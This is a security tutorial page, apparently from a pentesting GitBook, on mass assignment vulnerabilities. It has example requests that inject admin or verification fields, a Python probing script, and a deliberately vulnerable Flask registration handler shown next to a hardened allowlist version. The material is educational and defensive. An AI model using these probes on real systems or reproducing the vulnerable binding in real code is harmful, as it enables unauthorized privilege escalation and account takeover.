# Web Mass Assignment

One way to discover mass assignment vulnerabilities is to look for interesting parameters in the API documentation and then add those parameters to your own requests. Focus on parameters tied to user account properties, critical functions and administrative actions.

{% hint style="success" %}
*If you do not have the API docs, a simple test is to add extra key-values to the JSON POST body, such as:*

* `"isadmin": true`
* `"isadmin": "true"`
* `"admin": 1`
* `"admin": true`
{% endhint %}

* Normal request

```
POST /editdata HTTP/1.1
Host: target.com
...

username=daffa
```

The response reflects a hidden `isAdmin` property that the form never sent:

```
HTTP/1.1 200 OK
...

{"status":"success","username":"daffa","isAdmin":"false"}
```

* Modified request, with an extra `admin` parameter

```
POST /editdata HTTP/1.1
Host: target.com
...

username=daffa&admin=true
```

The response shows that the extra parameter was bound to the account:

```
HTTP/1.1 200 OK
...

{"status":"success","username":"daffa","isAdmin":"true"}
```

Example 2 - registration

The response to a normal registration reveals an `email_verified` field:

```
POST /api/register HTTP/1.1
[..]
{"email":"user1@example.com"}

HTTP/1.1 200 OK
[..]
{"userid":"112345","email":"user1@example.com","email_verified":false}
```

Sending that field in the request sets it, so the new account is created already verified:

```
POST /api/register HTTP/1.1
[..]
{"email":"user2@example.com","email_verified":true}

HTTP/1.1 200 OK
[..]
{"userid":"112346","email":"user2@example.com","email_verified":true}
```

Example - PATCH request

The user's profile object, as returned by the API, contains an `isAdmin` field that the normal edit form never sends:

```
{
    "username": "wiener",
    "email": "wiener@example.com",
    "isAdmin": false
}
```

First send a `PATCH` request with an invalid `isAdmin` value:

```
{
    "username": "wiener",
    "email": "wiener@example.com",
    "isAdmin": "foo"
}
```

If the application behaves differently (an error message, or a different status code), the invalid value is reaching the update logic while the valid value was accepted silently, which suggests that the field is writable by the user. Then send the `PATCH` with a valid value and check the profile again:

```
{
    "username": "wiener",
    "email": "wiener@example.com",
    "isAdmin": true
}
```

Example - array instead of a scalar value

Sending an array where the API expects a single string is another way to probe how loosely the input is bound; here the server accepts and stores both addresses:

```
POST /api/register HTTP/1.1
[..]
{"email":["user3@example.com","user4@example.com"]}

HTTP/1.1 200 OK
[..]
{"userid":"112347","email":["user3@example.com","user4@example.com"],"email_verified":false}
```

Other example - fuzz the company name or ID (the `§` markers delimit the Burp Intruder payload position):

```
{
  "username":"hacker",
  "email":"api@hacker.com",
  "org": "§CompanyA§",
  "password":"Password1!"
}
```
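The probing routine that the examples above describe, written out as an added Python example (this is not code from the original page): it takes a baseline request body, generates one probe per candidate key and value (the hint's `isadmin`/`admin` variants plus the PATCH section's invalid `"foo"` value), and reports every probe whose status code or response fields diverge from the baseline. The `VulnerableProfileService` class is a constructed in-memory stand-in for a vulnerable endpoint so that the script runs offline; against a real target the two `patch` calls would be HTTP requests.

```python
from typing import Any, Callable

# Constructed stand-in for a profile-update endpoint that binds request fields
# directly onto the stored record (hypothetical service, not the page's target.com).
class VulnerableProfileService:
    def __init__(self) -> None:
        self.users = {
            "daffa": {"username": "daffa", "email": "daffa@example.com", "isAdmin": False}
        }

    def patch(self, user: str, body: dict[str, Any]) -> tuple[int, dict[str, Any]]:
        record = self.users[user]
        # The "foo" probe from the PATCH section: a non-boolean isAdmin is rejected,
        # which already tells the tester that the field reaches the update logic.
        if "isAdmin" in body and not isinstance(body["isAdmin"], bool):
            return 400, {"status": "error", "message": "isAdmin must be a boolean"}
        # ORM-style binding: every body key that matches a model attribute is written,
        # with no allowlist of client-writable fields (the mass assignment flaw).
        for key, value in body.items():
            if key in record:
                record[key] = value
        return 200, {"status": "success", **record}


# Candidate names from the hint above plus a few common variants; the values
# cover boolean, string and integer forms and one deliberately invalid value.
CANDIDATE_KEYS = ["isadmin", "isAdmin", "admin", "is_admin", "role", "email_verified"]
CANDIDATE_VALUES: list[Any] = [True, "true", 1, "foo"]


def build_probes(baseline: dict[str, Any]) -> list[dict[str, Any]]:
    """One request body per (key, value) pair, each a copy of the baseline body."""
    return [dict(baseline, **{key: value}) for key in CANDIDATE_KEYS for value in CANDIDATE_VALUES]


def changed_fields(base_resp: dict[str, Any], probe_resp: dict[str, Any]) -> dict[str, Any]:
    """Response fields whose value differs from the baseline response."""
    return {k: v for k, v in probe_resp.items() if base_resp.get(k) != v}


def run_probes(make_service: Callable[[], VulnerableProfileService], user: str,
               baseline: dict[str, Any]) -> list[dict[str, Any]]:
    """Send the baseline, then every probe against a fresh service instance, and
    report the probes whose status code or response body diverged from the baseline."""
    base_status, base_resp = make_service().patch(user, dict(baseline))
    findings = []
    for body in build_probes(baseline):
        extra = {k: v for k, v in body.items() if k not in baseline}
        status, resp = make_service().patch(user, body)
        delta = changed_fields(base_resp, resp)
        if status != base_status or delta:
            findings.append({"sent": extra, "status": status, "changed": delta})
    return findings


def writable_fields(findings: list[dict[str, Any]]) -> set[str]:
    """Response fields that changed on an accepted (2xx) probe: the mass-assignable ones."""
    return {k for f in findings if 200 <= f["status"] < 300 for k in f["changed"]}


if __name__ == "__main__":
    results = run_probes(VulnerableProfileService, "daffa", {"username": "daffa"})
    for finding in results:
        print(finding)
    print("writable:", writable_fields(results))
```

The field that changes in the response need not carry the same name as the parameter sent (the first example on this page flips `isAdmin` by sending `admin`), which is why `writable_fields` reports changed response keys rather than the keys sent. The 400 responses for `"true"`, `1` and `"foo"` are the "behaves differently" signal described in the PATCH example: they prove the parameter is parsed even before a valid value confirms it is stored.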

## Guess Parameters

Hidden parameter names can also be brute-forced with the Burp extension Param Miner:

<figure><img src="/files/FDlauAOSQePk6qcHpOm0" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/ErRwjKNXosJzTT3imxRW" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/cTmFYM2Z2w1OGjBBTknn" alt=""><figcaption></figcaption></figure>

## Ruby on Rails

Ruby on Rails is the framework in which this class of bug became well known: before Rails 4, `ActiveRecord` models accepted every attribute present in the params hash unless the model restricted it with `attr_accessible` (allowlist) or `attr_protected` (denylist). Since Rails 4 this is handled by strong parameters (`params.require(:user).permit(...)`).

A model that allowlists only the safe attributes:

```ruby
class User < ActiveRecord::Base
  attr_accessible :username, :email
end
```

Without that line, a `User.new(params[:user])` call receiving the following params hash would also set `admin`:

```ruby
{ "user" => { "username" => "hacker", "email" => "hacker@example.com", "admin" => true } }
```

<figure><img src="/files/E4nULoBpLU82op3nfGK9" alt=""><figcaption></figcaption></figure>

Source code of the vulnerable application (Python/Flask with SQLite). The login handler only opens a session when the third column of the user row, the `confirmed` flag, is truthy:

```python
# Login: the third column (k) is the account's "confirmed" flag
for i,j,k in cur.execute('select * from users where username=? and password=?',(username,password)):
  if k:
    session['user']=i
    return redirect("/home",code=302)
  else:
    return render_template('login.html',value='Account is pending for approval')
```

The registration handler sets that flag from the request itself: `confirmed` is read from the form data, so any non-empty value supplied by the client creates an already-approved account:

```python
# Registration: 'confirmed' is taken straight from the client-controlled form
try:
  if request.form['confirmed']:
    cond=True
except:
  cond=False
with sqlite3.connect("database.db") as con:
  cur = con.cursor()
  cur.execute('select * from users where username=?',(username,))
  if cur.fetchone():
    return render_template('index.html',value='User exists!!')
  else:
    # the third column is written from cond, i.e. from the request
    cur.execute('insert into users values(?,?,?)',(username,password,cond))
    con.commit()
    return render_template('index.html',value='Success!!')
```

Registering with the extra parameter bypasses the approval step:

```
username=new&password=test&confirmed=test
```

<figure><img src="/files/AtjxCVrzUQHOyUJovFQG" alt=""><figcaption></figcaption></figure>
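Added example (not from the page or the application it shows): the registration and login logic above, reproduced against an in-memory SQLite table so that it runs offline, next to a hardened registration handler that reads only an allowlist of form fields and sets `confirmed` server-side, the Flask counterpart of the Rails allowlisting described above. `make_db`, `REGISTRATION_FIELDS` and the return strings for missing fields are assumptions of this example.

```python
import sqlite3
from typing import Optional


def make_db() -> sqlite3.Connection:
    """Constructed for this example: an in-memory copy of the page's users table
    (username, password, confirmed), standing in for database.db."""
    con = sqlite3.connect(":memory:")
    con.execute("create table users (username text, password text, confirmed integer)")
    return con


def register_vulnerable(con: sqlite3.Connection, form: dict) -> str:
    """Same logic as the page's registration handler: the 'confirmed' flag is
    taken from the client-controlled form, so confirmed=<anything non-empty>
    creates an account that is already approved."""
    cond = "confirmed" in form and bool(form["confirmed"])
    cur = con.cursor()
    cur.execute("select * from users where username=?", (form["username"],))
    if cur.fetchone():
        return "User exists!!"
    cur.execute("insert into users values(?,?,?)", (form["username"], form["password"], cond))
    con.commit()
    return "Success!!"


# Only these fields may come from the request; everything else is set server-side.
REGISTRATION_FIELDS = ("username", "password")


def register_hardened(con: sqlite3.Connection, form: dict) -> str:
    """Allowlist version: read exactly the permitted fields and write the
    'confirmed' column from a server-side default, never from the request."""
    missing = [f for f in REGISTRATION_FIELDS if not form.get(f)]
    if missing:
        return "Missing fields: " + ", ".join(missing)
    username, password = (form[f] for f in REGISTRATION_FIELDS)
    cur = con.cursor()
    cur.execute("select * from users where username=?", (username,))
    if cur.fetchone():
        return "User exists!!"
    # Approval state is a server decision; a client-supplied 'confirmed' is ignored.
    cur.execute("insert into users values(?,?,?)", (username, password, False))
    con.commit()
    return "Success!!"


def login(con: sqlite3.Connection, username: str, password: str) -> Optional[str]:
    """Same check as the page's login handler: a session is only opened when the
    third column (confirmed) is truthy. Returns the session user, or None when the
    account is pending approval or the credentials do not match."""
    for name, _pw, confirmed in con.execute(
        "select * from users where username=? and password=?", (username, password)
    ):
        return name if confirmed else None  # None: 'Account is pending for approval'
    return None


if __name__ == "__main__":
    payload = {"username": "new", "password": "test", "confirmed": "test"}
    vuln = make_db()
    print(register_vulnerable(vuln, payload), "-> session:", login(vuln, "new", "test"))
    safe = make_db()
    print(register_hardened(safe, payload), "-> session:", login(safe, "new", "test"))
```

The hardened handler keeps the page's other design decisions (plaintext passwords, no rate limiting) untouched so that the only difference is how request fields are bound: the fix for mass assignment is an explicit allowlist of client-writable fields, with state-bearing columns such as `confirmed` assigned by the server.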

## Resources

{% embed url="<https://www.vaadata.com/blog/what-is-mass-assignment-attacks-and-security-tips/>" %}


## Interesting Books

{% content-ref url="/pages/VVT5FQq9z62bWoNAWCUS" %}
[Interesting Books](/0xss0rz/interesting-books.md)
{% endcontent-ref %}

{% hint style="info" %}
**Disclaimer**: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.
{% endhint %}

* [**The Web Application Hacker’s Handbook**](https://www.amazon.fr/dp/1118026470?tag=0xss0rz-21) The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more
* [**Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities**](https://www.amazon.fr/dp/1718501544?tag=0xss0rz-21) Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them
* [**Real-World Bug Hunting: A Field Guide to Web Hacking**](https://www.amazon.fr/dp/1593278616?tag=0xss0rz-21) Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.

